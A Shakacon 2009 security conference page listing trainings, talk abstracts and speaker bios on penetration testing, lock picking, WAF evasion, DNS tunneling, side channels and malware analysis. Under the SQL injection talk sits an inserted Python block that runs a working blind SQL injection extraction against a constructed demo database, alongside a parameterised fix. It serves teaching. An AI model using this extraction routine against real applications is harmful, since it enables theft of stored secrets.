Shakacon III
SHAKACON 2009 TALKS NOW AVAILABLE!!! All 2009 talks have been uploaded and are now available by accessing the speaker topics on the right (select the talk title below the speaker name and click "Download Talk" in the pop-up). Shakacon recap coming soon... All 2008 presentations and pictures are available here: http://www.shakacon.org/2008/Presentations.zip http://www.shakacon.org/2008/images/index.html
SHAKACON AGENDA NOW AVAILABLE: http://shakacon.org/agenda.pdf
CTF RULES AND REQUIREMENTS NOW AVAILABLE: http://shakacon.org/CTF_2009.txt
1:11 PM 6/24/2009
Shakacon III 2-Day Conference
2009 CALL FOR PAPERS HAS ENDED!
- $99 ($103.66 with tax; $149 after May 10th)
- 1 Day Pre-Conference Training Package - $499 ($522.51 with tax)
- $999 ($1046.07 with tax)
- $1399 ($1464.92 with tax; $1499 after May 10th) - FREE Shakacon III 2-Day Conference included!
Select one (1) of the following Pre-Conference Training Packages:
SELECTED TRAINING COURSES:
SELECTED SPEAKERS:
Mastery of Physical Security Overview:
Physical security is an oft-overlooked component of data and system security in the technology world. While frequently forgotten, it is no less critical than timely patches, appropriate password policies, and proper user permissions. You can have the most hardened servers and network, but that doesn't make the slightest difference if someone can gain direct access to a keyboard or, worse yet, march your hardware right out the door. Those who attend this session will leave with a full awareness of how best to protect buildings and grounds from unauthorized access. Attendees will not only learn how to distinguish good locks and access control from poor ones, but will also become well-versed in lock picking, bypass techniques, access controls, electronic systems, and post-intrusion forensics... convince management that a new investment is necessary by showing them yourself how the server room door can be opened without a key in under a minute! :-) If you have your own lockpick tools, you are welcome to bring them, but this is not necessary. A set of tools will be provided to you as part of the course.
Deviant Ollam's Bio:
While paying the bills as a network engineer and security consultant, Deviant Ollam's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's "Science, Technology, & Society" program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. A fanatical supporter of First Amendment rights who believes that the best way to increase security is to publicly disclose vulnerabilities, Deviant has given lockpick demonstrations at ShmooCon, DefCon, Black Hat, ToorCon, HOPE, HackCon, HackInTheBox, ShakaCon, and the United States Military Academy at West Point.
Crash Course on Penetration Testing & Web Application Security Testing with Firefox Overview:
Day 1 - Crash Course in Penetration Testing
This course will cover some of the newer aspects of penetration testing such as Open Source Intelligence Gathering with Maltego and other Open Source tools.
Advanced Scanning, Enumeration, Exploitation (remote and client-side), and Post-Exploitation relying heavily on the features included in the Metasploit Framework will also be covered.
Emphasis throughout the entire workshop will be placed on being as stealthy as possible, and dealing with popular defensive technologies such as:
Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection.
Day 2 - Web Application Penetration Testing with Firefox
There are a few commercial vulnerability scanners and penetration testing tools for the Web Application security space. There are even fewer open-source vulnerability scanners and penetration tools that serve this purpose. Firefox with its collection of security extensions and its relative ease of extension development is fast becoming a Web Application Penetration Testing platform of choice.
This workshop will focus on using Firefox as a Web Application Penetration Testing platform, developing Firefox extensions to automate common penetration testing tasks, and writing extensions to address issues that commercial tools don't.
Joe McCray's Bio:
Founder of LearnSecurityOnline.com and Rapid7 Assessment Practice Manager.
Dangerous Minds: The Art of Guerilla Data Mining Overview:
The inspiration for this study is the dollar bill. More specifically, the "Eye of Providence" or the "all-seeing eye" floating on the back of the US dollar bill. But this presentation is not about eyes, or the US dollar, or the Da Vinci Code, but about knowledge and information.
It is no secret that in today's world, information is as valuable as, or maybe even more valuable than, any military tool we have out there. Information is the key. That is why the motto of the US Information Awareness Office (IAO) is "scientia est potentia", which means "knowledge is power". The IAO, just like the CIA, FBI and others, makes information its business. Aside from these there are multiple military-related projects like TALON, ECHELON, ADVISE, and MATRIX that are concerned with information gathering and analysis.
So now, in the context of extremely witty acronyms, we would like to present the Virtual Extraction Review, Insight and Threat Analysis System, or VERITAS. Unfortunately, it's not actually a system but a framework, but I guess it would have to be, because it would have much less impact if we called it VERITAF.
VERITAS is a combination of tools and techniques to conduct data mining for security. Think of it as threat intelligence in a box. The idea here is to use data mining in order to analyze and gain insight into different threats. This can be used to visualize trends (e.g. security trends, worms, viruses), summarize large data sets (forums, blogs, IRC), gather a high-level understanding of a topic (e.g. technologies), and automatically categorize different topics for research (malware descriptions). And since it's a framework, you can actually use different tools and techniques in order to get what you need.
In this presentation I will give a high-level overview of the framework, provide background on data mining, and present some cases to illustrate the approach.
Mark Ryan Talabis's Bio
Ryan is a Consultant within the Secure DNA Consulting practice. He has over eight years of experience in Information Technology (IT) security, systems analysis and design, and software and web application development. He has extensive experience in vulnerability assessments and application penetration testing and has specialized expertise in security analysis and computer forensics. Recently, he became a founding member of the Hawaii Honeynet Project. Prior to Secure DNA Consulting, he was the lead analyst of the Philippine Honeynet Project. He was a consultant for the Asian Development Bank (ADB), a lecturer for Ateneo de Manila University and the former Director of Software Development of Slingshot Interactive, a startup internet and database consultancy firm in Manila. He has been involved in the various security analysis activities of the Honeynet Research Alliance and the Leurre'Com Project, performed Incident Handling duties for the Philippine CERT, and conducted vulnerability and penetration testing for the Asia-Pacific CERT. He is also the Community Manager for the Networks and Security Section of the UNDP-APDIP International Open Source Network. He has an MS in Information Technology and holds the Certified Information Systems Security Professional (CISSP), Certified Information Systems Auditor (CISA), Microsoft Certified Professional (MCP), GIAC Certified Incident Handler (GCIH) and GIAC Security Essentials (GSEC) certifications. He has presented at a number of conferences such as Blackhat, INFORMS, ISSA, etc. He is also very active in honeynet research and has a number of published papers to his name in various peer-reviewed journals.
The Truth about Web Application Firewalls: What the vendors do not want you to know Overview:
Web Application Firewalls (WAFs) are quickly taking their place within the network in order to protect web applications against common security holes such as Cross Site Scripting and SQL injection. They are known by other names such as 'Deep Packet Inspection Firewalls' because they look at every request and response within the TLS, HTTP, SOAP, XML-RPC and Web Service layers. Web Application Firewalls can be either software-based or hardware appliances and are typically installed in front of a webserver in an effort to shield it from incoming attacks. Today WAF systems are considered the next-generation product for protecting websites against web hacking attacks.
During this presentation we will show in practice how the big-name Web Application Firewalls can be identified and detected, and we will introduce new attacks to evade specific products. Additionally, we will show how Web Application Firewalls can be vulnerable to the same vulnerabilities they try to protect Web Applications from.
Bonus: we will be releasing a new tool and a new exploit.
Wendel Guglielmetti Henrique and Sandro Gauci's Bio
Wendel Guglielmetti Henrique has worked in IT since 1997, and for the last 7 years he has worked in the computer security field. He has found vulnerabilities in many software products such as Webmail systems, Access Points, Citrix Metaframe, etc. Some tools he wrote have already been used as examples in articles in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine. For the past 3 years he has been working as a Penetration Tester.
Sandro Gauci is the owner and Founder of EnableSecurity (www.enablesecurity.com), where he performs R&D and security consultancy for mid-sized companies. Sandro has over 8 years of experience in the security industry and is focused on the analysis of security challenges and providing solutions to such threats. His passion is vulnerability research, and he has previously worked together with various vendors such as Microsoft and Sun to fix security holes.
Sandro is the author of the free VoIP security scanning suite SIPVicious (sipvicious.org).
$1.7 Trillion Under Siege (or the role of penetration testing and vulnerability scanning in a really big bank):
Taking technical security knowledge and putting it to work in a huge organization presents many challenges. Among them: how do you communicate technical needs to non-technical people responsible for funding and other key decisions, and then deliver something useful and cost-effective? In this presentation, I plan to use the case study of the Global Vulnerability Management program in my organization to discuss the following:
i) What are we trying to do here: Just what is a global threat and vulnerability management program about? What kind of threats does a large organization face? Are they different than those a smaller one faces?
ii) What are the problems we face: Just what kind of threats do we face? How do you get accurate threat information? How do you convey the seriousness of these issues? How do you coordinate resources? How do you deal with regulators and auditors?! How does a techie get his point across in a massive corporate environment?
iii) What was our approach: Technologies we bought, technologies we had to buy. Processes we had to implement and things we had to concede. Making tools do things they may not be advertised for. Working with different teams from different fields.
iv) Some more on tools: what's good? what's bad? how do you deal with the bad? why are there so many vendors and how come none of them make what I need?
v) Dealing with regulators and audit issues: Not the most interesting topic, and it drives you nuts, but we need to talk about it (only briefly though)
vi) The future: Where are we going with this?
Mark Stamford's Bio:
Mark's entry into the world of computers came in 1981 when his parents bought him a Sinclair ZX81 (a powerful beast with 1k of RAM). He then proceeded to become acquainted with its workings, then moved on through various machines up to the Mac he is writing this on. Along the way he watched Wargames, got interested in security and went from there. In a professional sense he has worked a couple of jobs in the security field, including being the network security bod for a financial trading company and a security consultant for a big 4 firm, and now works for a large financial institution heading up the Global Threat and Vulnerability Management Program (that's a long title to have to put on a card), where he is responsible for the security of approx 200,000 systems running on a variety of platforms and doing a variety of things.
He also enjoys music (making and listening), getting outside and enjoying nature, the occasional beer with good conversation and the fine movies of Steven Seagal.
Exploit or Exception? Overview:
One of my former students said to me, "...the hardest part I find about the job [bug hunting primarily via fuzzers] is identifying what my exceptions are, what causes them, and whether or not they're interesting ..." It turns out this is a bit challenging, particularly if you're new to the world of reverse engineering, debugging, low-level exploit development, and such. This talk will walk through examples of fuzzers finding real bugs in software like QuickTime and exploring, technically, whether the bug is "interesting" or not.
Jared DeMott's Bio:
Jared DeMott is a senior security researcher for Crucial Security Inc., frequent speaker, former teacher, and author. He has been deeply involved in the security community since his first job at NSA in 2000. Jared is probably best known for the fuzzing tool GPF, which he released in 2005.
GSM/GPRS/UMTS security and traffic interception Overview:
I will speak about telecommunications security, focused on GSM/GPRS/UMTS security, traffic interception, mobile phone forensics and anti-forensics, phone vulnerabilities, how to secure communications, locating mobile phones, secure calls, and how to create a secure scenario (building your own GSM network and creating a secure PBX to encrypt the calls).
I will do a live demo, sniffing the GSM traffic from different local operators with special hardware. The hardware I will use to sniff the traffic has never been released to the public.
PaTa's Bio:
I have been playing and doing research with telecommunications since I was a child.
Nowadays, I'm the coordinator of the telecommunications line at Imaginarium, which is the most specialized toy retail chain in the world, with 340 shops in 28 countries. You can find more information at www.imaginarium.info.
Besides, I'm responsible for two models of mobile phones for children.
I have worked at www.indra.es in the past.
I have been a speaker at some security conferences:
- Foro Tecnoatlantico Caixa Nova. 2005. Oviedo, Spain
- Ciclo de conferencias San Alberto Magno. 2005. Murcia University, Spain
- 1º Congreso Internacional de Hackers. 2004. Manizales University, Colombia
- G-Con Three. 2004. México D.F.
- Undercon. 2003. Murcia, Spain
- G-Con Two. 2003. México D.F.
Exploiting Rich Content Overview:
As RIA (Rich Internet Application) technologies flourish in the marketplace, many wonder what impact they will have on the security landscape. iSEC Partners routinely performs assessments of emerging technologies to better understand their risks and how to remediate these risks in live deployments. As RIA technologies advance, vendors move to complex file formats as a solution for delivering rich content. With this in mind, iSEC Partners performed an assessment of various file formats used by the popular RIA implementations. During the assessment of these technologies several issues were discovered. At first glance these issues may appear harmless. This presentation will demonstrate how these often-considered low-risk issues can be carefully exploited to have a much deeper impact. Developers should be aware of these common programming mistakes when developing complex file formats, which are especially critical in Rich Internet Applications.
Riley Hassell's Bio:
Riley Bruington Hassell is an internationally recognized security professional. He is an industry expert in the fields of application security assessment, software reverse engineering and malware analysis. Mr. Hassell discovered and disclosed some of the most critical software vulnerabilities to date. Throughout 2000 and 2001 he was responsible for several critical vulnerabilities, each having major repercussions on the security industry at large. Most notably, Mr. Hassell was responsible for the discovery of the first critical remote vulnerabilities in Windows 2000 and Windows XP. He also discovered the vulnerability that triggered the Code Red Internet worm. His initial dissection of the worm was used to develop and put in place protective measures to safeguard the network targeted by Code Red, the Whitehouse public network. Taking his research a step further, he forecast future worm technologies and presented them at the Blackhat security conference. During 2002 Mr. Hassell performed an assessment of popular security products. During his assessment he discovered critical vulnerabilities in several leading security products, pushing security vendors to take a second look at their software. Mr. Hassell spent the following several years working with start-up ventures to pioneer product technologies in the patch management, intrusion prevention, vulnerability analysis and malware analysis fields. Mr. Hassell is currently working with the internationally renowned security assessment firm iSEC Partners.
Challenge of Windows physical memory acquisition and exploitation Overview:
In 2008, the interest of companies and governments in Microsoft Windows physical memory grew significantly. Acquisition was one of these challenges. The author will present a free and open-source tool he created, called win32dd, to acquire Windows physical memory in various formats.
Moreover, he will show how interoperability between existing formats can help incident response engineers and investigators improve their results in the information extraction process through existing free tools like the Microsoft Windows Debugger.
Matthieu Suiche's Bio:
Matthieu Suiche is a security researcher who focuses on reverse code engineering and volatile memory forensics. He has been a speaker at various security conferences such as PacSec, BH USA and the EUROPOL High Tech Crime Meeting. His previous research on Windows hibernation helped several investigators from all around the world extract information from an undocumented Microsoft file format. He is reachable through his website at http://www.msuiche.net
Microsoft patches little sister but forgets big brother Overview:
This presentation introduces methods used by hackers/attackers to hunt vulnerabilities in Microsoft Windows products, such as Internet Explorer and the Windows operating system. These include reverse engineering, surfing the Web, and diffing Microsoft modules. The presentation also covers why these methods are innovative or significant, and includes an important tutorial. Attackers can use these methods to hunt for zero-day exploits.
Summary of the points we plan to cover:
* Introduce past zero-day exploits
* Discuss how they were found
* Why attackers hunt for zero-days
* How a programmer's bug is a hacker's treasure
* Microsoft silently fixed vulnerabilities
* Hunting zero-days the easy way: DIFFING!
Moti Joseph's Bio:
Moti Joseph has been involved in computer security since 2000. For the past 7 years, he has been working on reverse engineering exploit code and developing security products. He is currently a Senior Security Researcher with Websense Security Labs.
Packing and the Friendly Skies Overview:
Many of us attend cons and other events which involve the transportation of computers, photography equipment, or other expensive tech in our bags. If our destination is far-flung, often air travel is involved... this almost always means being separated from our luggage for extended periods of time and entrusting its care to a litany of individuals with questionable ethics and training.
After a particularly horrible episode of baggage pilferage and tool theft, I made the decision to never again fly with an unlocked bag. However, all "TSA compliant" locks tend to be rather awful and provide little to no real security. It was for this reason that I now choose to fly with firearms at all times. Federal law allows me (in fact, it REQUIRES me) to lock my luggage with proper padlocks and does not permit any airport staffer to open my bags once they have left my possession.
In this talk, I will summarize the relevant laws and policies concerning travel with weapons. It's easier than you think, often adds little to no extra time to your schedule (indeed, it can EXPEDITE the check-in process sometimes), and is in my opinion the best way to prevent tampering and theft of bags during air travel.
Deviant Ollam's Bio:
While paying the bills as a network engineer and security consultant, Deviant Ollam's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's "Science, Technology, & Society" program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. A fanatical supporter of First Amendment rights who believes that the best way to increase security is to publicly disclose vulnerabilities, Deviant has given lockpick demonstrations at ShmooCon, DefCon, Black Hat, ToorCon, HOPE, HackCon, HackInTheBox, and the United States Military Academy at West Point.
The Art of Espionage Overview:
We have all heard the stories about looted laptops, misplaced media, and stupid user mistakes that have led to losses in the millions. But what about the incidents that don't get published or noticed? This upbeat presentation will discuss the role that espionage plays in today's corporate world and will introduce many new attack and defense techniques. Previously unpublished case studies, a live demonstration, and audience participation will be used to help arm the audience with the basic knowledge needed to implement a multilayered security program that will help defend against these dangerous threats.
Luke McOmie (Pyr0)'s Bio:
Luke McOmie is a Security Consultant for BT/INS. Luke helps protect and defend hundreds of the world's largest companies and organizations. He specializes in Corporate Espionage and Physical Security but is well versed in everything from Risk Analysis to Incident Response. Formerly a senior consultant at the Department of the Interior (Bureau of Communications and Technology), he managed a national CSIRT responsible for Active Threat Defense, Risk Mitigation, and Incident Response. Luke is a senior staff member (goon) at the DEFCON Security Conference (http://www.defcon.org) and also contributes to several computer security organizations including the r00tcellar Security Team, 303 and Security Tribe.
Dynamic Tracing for Exploitation and Fuzzing Overview:
This talk will cover the use of dynamic tracing for exploit development and fuzzing. We will show the audience how dtrace can be used to help track down bugs, visualize code coverage and gather critical information about the application. We will apply these techniques on OS X and FreeBSD, giving specific examples and discussing dtrace's limitations. We will also show how a custom programmatic debugger can be created to overcome dtrace's limitations. Building on previous work, we will show how dtrace can be used for fuzzing libraries and device drivers.
Tiller Beauchamp's Bio:
Tiller Beauchamp is a principal security consultant at IOActive, where he helps provide comprehensive security services to customers around the world.
Beauchamp enjoys breaking his customers' products and then figuring out how to fix them. His latest areas of interest include application and protocol exploitation, covert channels and malware. Beauchamp has spoken at Blackhat, Defcon and Recon and holds an M.S. degree in Computer Science from the University of Oregon.
Securing With the Enemy: Social Strategy and Teams of Rivals Overview:
While computer science is not traditionally viewed as a social science, problems in its domain are inherently social in nature - relating to people, their interactions and the relationships between them and their organizational contexts. The broad scope of the field of "security engineering" and increasing recognition that economics and psychology are integral parts of security are good examples of this, but only begin to scratch the surface. We will present this unexpected new lens and examine the two areas of economics and psychology in security, extracting insights and generalizing concepts to help attendees understand how these perspectives might be useful in their own roles.
Sarah Blankinship will introduce the perspective and explain its application in the Microsoft security ecosystem over the last few years. Sarah is a Senior Security Strategist, an 'EcoStrategist', leading the Security Ecosystem Strategy team within the Microsoft Security Response Center (MSRC) to engage security communities from around the world to research and respond to software vulnerabilities.
Jon Pincus will apply a similar perspective from social science theories to the field of static analysis as it relates to security. Jon's return to static analysis (he was architect of PREfix and PREfast from 1995-2001) provides an opportunity for a unique perspective, highlighting where progress has been made, where it hasn't, and identifying the remaining barriers to pervasive deployment of static analysis tools -- in particular, user interface challenges for defect understanding and work-in-context. Developments in disciplines like "gender HCI" and captology may offer paths forward. At the same time, efforts like SAMATE and Coverity's Scan are building the social infrastructure for the community as a whole to follow the lead of the security research community and incorporate an explicit ecosystem focus.
The important theme to discuss is opportunities for shared goals and cooperation from organizations and people usually seen as rivals: security researchers and software engineers, developers and security auditors, employees of bitter competitors. In many situations, well-chosen "teams of rivals" strategies -- while easy to overlook -- offer substantial benefits and positive-sum outcomes. We'll close the session by showing how to apply this approach to several timely challenges in the computer security field.
Sarah Blankinship and Jon Pincus's Bio:
Pincus' previous relevant work includes leading the Analysis and Development of Awesome STRAtegies project as General Manager for Strategy Development in Microsoft's Online Services Group, and creating the static analysis tools PREfix and PREfast (now available in Visual Studio) at his startup Intrinsa and then at Microsoft Research.
Blankinship's team, the Microsoft Security Response Center Ecosystem Strategy Team, operates at the intersection of technology and people and strives to understand how vulnerabilities affect the Internet as a whole; its collaboration is meant to advance and improve security. Sarah is an advocate of uniting people, passion and policy to address common security concerns.
Playing with Heyoka: spoofed tunnels, undetectable data exfiltration and more fun with DNS packets Overview:
DNS tunneling is a well-known technique, and various free tools are available to play with it. However, its full power has not been fully unleashed yet: several of the existing tools are mostly targeted at reading email for free from an airport lounge and not at being used as a deadly post-exploitation weapon. Also, they all suffer from the fact that a DNS tunnel is painfully slow and quite easy to detect and locate.
In this talk we will introduce a few new tricks that will allow us to:
- Improve the tunnel speed, by leveraging the fact that most DNS servers are happy to process packets that are not exactly 100% compliant with the RFCs
- Make the DNS tunnel a lot harder to detect, by spoofing the source IP address of the queries, therefore spreading the traffic signature among all the hosts of the subnet.
Of course there will be a demo, in which we will release the first official version of Heyoka, a brand new tool implementing these ideas.
Alberto Revelli and Nico Leidecker's Bio:
Alberto (aka icesurfer) lives and works in London, where he enjoys the bad weather and the astronomical cost of living. He works as a penetration tester and researcher for Portcullis Computer Security, spending most of his time breaking into web applications and into anything else that happens to tickle his curiosity. He has co-authored the OWASP Testing Guide, is a contributing author of the book "SQL Injection Attacks and Defense" (ISBN: 978-1-59749-424-3) and has developed sqlninja, an open source SQL Server exploitation toolkit (http://sqlninja.sourceforge.net)
Nico got his degree in Computer Science at the Karl-Ruprechts University of Heidelberg, Germany, with a thesis regarding an Authority Based Extension to the ARP Protocol to prevent MITM attacks. He now works as a penetration tester for Portcullis Computer Security, and in his spare time enjoys analyzing the security of databases (http://www.leidecker.info/downloads/Having_Fun_With_PostgreSQL.pdf) and developing various security tools (http://www.leidecker.info/projects/)
Emerging Trends in Security and Risk Management Overview:
The evolution of Security and Risk Management has progressed considerably since the days when a "Firewall" was considered "Security". Today's trends involve a greater focus on Risk Management as a corporate function that extends well beyond computers and IT, reaches into the Board Room and into business operations, and is inclusive in its needs. This talk will discuss new models of governance and oversight, new roles that have been taken up by Chief Security Officers, how the process of inclusion has raised awareness and participation in the Security and Risk Management process, and how new operational models have strengthened companies' resilience.
The talk will discuss new models of governance that include stakeholders from multiple areas of the business, approaches to awareness that create higher levels of participation and success, methods to improve efficiencies in security operations, and organizational structures that include key risk management personnel in the process.
Daniel Blander's Bio:
Daniel is President of the consulting firm Techtonica, Inc. and CEO of InfoSecurityLab, Inc. He has over twenty years of experience building world-wide security organizations for international companies in the financial, technology, retail, healthcare, manufacturing, airline, and telecom industries. He has developed unique programs for achieving compliance, governance, operational efficiency, and security awareness, and brings a unique perspective from his international experience and contacts. Daniel's work resulted in his nomination in 2008 as Information Security Executive of the Year for the West by the Executive Alliance.
Sniff keystrokes with lasers/voltmeters: Side Channel Attacks Using Optical Sampling of Mechanical Energy Emissions and Power Line Leakage Overview:
TEMPEST attacks, exploiting electromagnetic emissions in order to gather data, are often mentioned by the security community, movies and wanna-be spies (or NSA employees, we guess...).
While some expensive attacks, especially the ones against CRT/LCD monitors, have been fully researched and described, some others remain relatively unknown and haven't been fully (publicly) researched.
Following the overwhelming success of the SatNav Traffic Channel hijacking talk, we continue with the tradition of presenting cool and cheap hardware hacking projects.
We will explore two unconventional approaches for remotely sniffing keystrokes on laptops and desktop computers using mechanical energy emissions and power line leakage. The only thing you need for a successful attack is either the electrical grid or a distant line of sight; no expensive piece of equipment is required.
We will show the two attacks in detail and all the necessary instructions for setting up the equipment. As usual, cool gear and videos are going to be featured in order to maximize the presentation.
Andrea Barisani & Daniele Bianco's Bio:
Andrea Barisani is a security researcher and consultant. His professional career began 8 years ago, but it all really started when a Commodore-64 first arrived in his home when he was 10. Now, 17 years later, Andrea is having fun with large-scale IDS/Firewall deployment and administration, forensic analysis, vulnerability assessment, penetration testing, security training and his Open Source projects. He eventually found that system and security administration are the only effective way to express his need for paranoia.
Being an active member of the international Open Source and security community, he is maintainer/author of the tenshi and ftester projects as well as the founder and project coordinator of the oCERT effort, the Open Source Computer Emergency Response Team.
He has been involved in the Gentoo project, being a member of the Gentoo Security and Infrastructure Teams, and in the Open Source Security Testing Methodology Manual, becoming an ISECOM Core Team member. Outside the community he has been a security consultant for Italian firms and he is now the co-founder and Chief Security Engineer of Inverse Path Ltd.
He has been a speaker and trainer at PacSec, CanSecWest, BlackHat and DefCon conferences among many others, speaking about SatNav hacking, 0-days, LDAP and other pretty things.
Daniele Bianco is a system administrator and IT consultant. He began his professional career as a system administrator during his early years at university. His interest in centralized management and software integration in Open Source environments has focused his work on the design and development of suitable R&D infrastructure.
Daniele is currently working as a consultant for Italian astrophysics research institutes, providing support for the design, development and administration of IT infrastructure.
One of his hobbies has always been playing with hardware, and recently he has been focusing his attention on in-car wireless and navigation systems. He is the resident Hardware Hacker for international consultancy Inverse Path Ltd.
Daniele holds a Bachelor's degree in physics from the University of Trieste.
Rage Against the Kiosk Overview: Download Talk
My name is Paul Craig, and I am the self-proclaimed "King of Kiosk Hacking".
Last year at Defcon 16, I released iKAT v1.0 (the Interactive Kiosk Attack Tool). iKAT is an online tool designed to allow users to hack an Internet Windows Kiosk terminal in less than one minute. Thousands of Kiosks worldwide have accessed iKAT and witnessed its Kiosk hacking power.
Kiosk vendors ran for cover after the Defcon release, fixing their software and explicitly blocking iKAT and my techniques. The year is now 2009, and I have spent my spare time playing with more Kiosks, with even more success than ever before!
iKAT v2.0 is now ready to be released, with more oh-day, more tools and more tricks, to provide you with the ultimate Kiosk hacking experience.
Paul Craig's Bio:
Paul Craig is a principal security consultant at Security-Assessment.com in Auckland, New Zealand, where he runs two teams of penetration testers out of Auckland and Wellington.
Paul is an active security researcher, published author, and a devoted hacker. Paul specializes in application penetration testing and has spoken at various conferences around the globe.
Paul is passionate about security and thrives on privilege escalation and popping shells whenever possible.
Advanced SQL Injection Overview: Download Talk
SQL Injection is a vulnerability that is often missed by web application security scanners, and it's a vulnerability that is often rated as NOT exploitable by security testers when it actually can be exploited.
Advanced SQL Injection is a presentation geared toward showing security professionals advanced exploitation techniques for situations when you must prove to the customer the extent of compromise that is possible.
The key areas are:
* IDS Evasion
* Privilege Escalation
* Re-Enabling stored procedures
* Obtaining an interactive command-shell
* Data Exfiltration via DNS
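The abstract's first point, that an injection a tester has written off as "not exploitable" usually still is, is easiest to see on a case where the application returns no error text and no data, only a yes/no answer. The following is an added illustration written for this page, not code from the talk or from Joe McCray: a constructed SQLite database, a hypothetical `user_exists_vulnerable` endpoint that concatenates its input into SQL but exposes only a boolean, and a boolean-based blind extraction routine that recovers a secret value one character at a time through that boolean alone. The same routine run against a parameterised version of the endpoint recovers nothing. The table, column and user names, and the assumption that the attacker knows one valid username (`guest`) to anchor the probe on, are all assumptions of the example.

```python
import sqlite3
import string

def build_db():
    """Constructed demo database (not from the talk): one table, one admin API key."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, api_key TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "K3y-s3cr3t"), (2, "guest", "guest-key")])
    return conn

def user_exists_vulnerable(conn, name):
    """Hypothetical 'does this username exist' endpoint. It concatenates the input
    into SQL, but returns only True/False and swallows every database error, so a
    scanner sees no error message and no data, and the injection looks harmless."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def user_exists_fixed(conn, name):
    """Same endpoint with a parameterised query: the input is never parsed as SQL."""
    row = conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None

# Characters tried per position; quotes are deliberately excluded so the probe
# itself stays syntactically valid inside the single-quoted literal.
CHARSET = string.ascii_letters + string.digits + "-_"

def blind_extract(oracle, column, where, max_len=64):
    """Boolean-based blind extraction through a yes/no oracle.
    Each probe asks one question: is character `pos` of the target equal to `ch`?
    The probe opens with a known-valid username ('guest', an assumption) so the
    AND clause decides the answer; the closing quote comes from the vulnerable
    query itself. SQLite's default collation is case-sensitive, so each answer is
    exact. When no character matches, substr() has run past the end of the value."""
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for ch in CHARSET:
            probe = ("guest' AND substr((SELECT %s FROM users WHERE %s),%d,1)='%s"
                     % (column, where, pos, ch))
            if oracle(probe):
                matched = ch
                break
        if matched is None:
            break
        recovered += matched
    return recovered

def demo():
    """Run the extraction against the vulnerable and the fixed endpoint."""
    conn = build_db()
    leaked = blind_extract(lambda n: user_exists_vulnerable(conn, n),
                           "api_key", "name='admin'")
    blocked = blind_extract(lambda n: user_exists_fixed(conn, n),
                            "api_key", "name='admin'")
    return leaked, blocked

if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable endpoint leaked:", leaked)      # K3y-s3cr3t
    print("fixed endpoint leaked:", repr(blocked))    # ''
```

The point for a tester is the cost model, not the cleverness: with a charset of 64 symbols the worst case is 64 requests per character, which is trivial to automate, so "no error message and no data in the response" is never grounds for rating an injection unexploitable. Against a database that exposes a sleep or DNS-resolving function, the same loop works with a timing or DNS-lookup oracle in place of the boolean.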
Joe McCray's Bio:
Founder of LearnSecurityOnline.com and Assessment Practice Manager at Rapid7.
Application Security: For Hackers and Developers (3 day) Overview:
There are four technical skills required by security researchers, software quality assurance engineers, or developers concerned about security: source code auditing, fuzzing, reverse engineering, and exploitation. All these skills and more are covered in a new and exciting Crucial Security course developed by senior security researcher Jared DeMott. C/C++ code has long been plagued by security errors resulting from memory corruption. Problematic code is discussed and searched for in lectures and labs. Web auditing is covered using WebGoat. Fuzzing is a topic that DeMott, who has authored a book on it, knows well. Mutation file fuzzing and framework definition construction (Sulley and Peach) are just some of the lecture and lab topics. When it comes to reversing C/C++ (Java and others are briefly discussed), IDA Pro is the tool of choice. Deep usage of this tool is covered in lecture and lab. Exploitation discussions and labs are the final component. You’ll enjoy exploiting everything from BSD local programs to Vista browsers using the latest techniques.
Jared DeMott's Bio:
Jared DeMott is a senior security researcher for Crucial Security, based in Chantilly, Virginia. Crucial Security provides state-of-the-art technical engineering and security services to the most elite branches of the Federal Government’s law enforcement and intelligence communities, engineering solutions to meet their demanding requirements. Mr. DeMott previously worked for the NSA and currently teaches university computer engineering classes in the evenings. He has spoken at security conferences such as Black Hat, Defcon, ToorCon, and Shakacon. This background provides an ideal blend of skills for teaching cutting edge security material in a fun and instructive manner.
Introduction to Malware Analysis (3 day) Overview:
Security researchers are facing a growing problem in the complexity of malicious executables. While dynamic black-box automation tools exist to discover what malware will do on a given execution, it is often important for an analyst to know the full capabilities of a given malware sample. What port does it listen on? What password does it expect for backdoor access? What files will it write to? What will it do tomorrow that it didn't do today?
This class will focus on teaching attendees the steps required to understand the functionality of given malware samples. This is a hands-on course. Attendees will work on real-world malware through a series of lab exercises designed to build their expertise in understanding the analysis process.
Scott Lambert and Jason Geffner's Bio:
Scott Lambert is a Security Program Manager on the Microsoft Malware Protection Center (MMPC) team at Microsoft. He is responsible for advancing internal binary analysis tools in support of vulnerability analysis and automatic signature generation.
Prior to joining Microsoft, Lambert developed, maintained and supported numerous computer security applications ranging from Vulnerability Assessment and Risk Management software to Network and Host-Based Intrusion Detection/Prevention Systems for companies such as L-3 Network Security, Veridian Information Solutions, Symantec Corporation and TippingPoint, a division of 3Com. In addition, he developed and implemented test plans for the evaluation of both wired and wireless Intrusion Detection Systems and performed advanced protocol analysis in support of research and validation of various computer and network vulnerabilities and attack techniques.
Jason Geffner joined Next Generation Security Software Ltd. in June of 2007 as a Principal Security Consultant. Prior to joining NGS, Jason spent nearly three years as a Reverse Engineer on Microsoft Corporation's Anti-Malware Team, where his work involved analyzing malware samples, deobfuscating binaries, and writing tools for analysis and automation. Jason was the Security Research & Response owner of the Windows Malicious Software Removal Tool (MSRT). He chose which new malware families the MSRT would detect and clean each month based on his analysis of the telemetry and trends of the underground malware community. Jason authored tens of thousands of malware signatures and dozens of malware analyses based on static and dynamic analyses of obfuscated binaries. His work on the MSRT helped hundreds of millions of Windows users each month keep their computers safe and secure. While at Microsoft, Jason was recognized for his reverse engineering skills and for his efforts to drive awareness of reverse engineering practices throughout the company by being given the formal job title "Reverse Engineer"; Jason was the only Microsoft employee with this title.
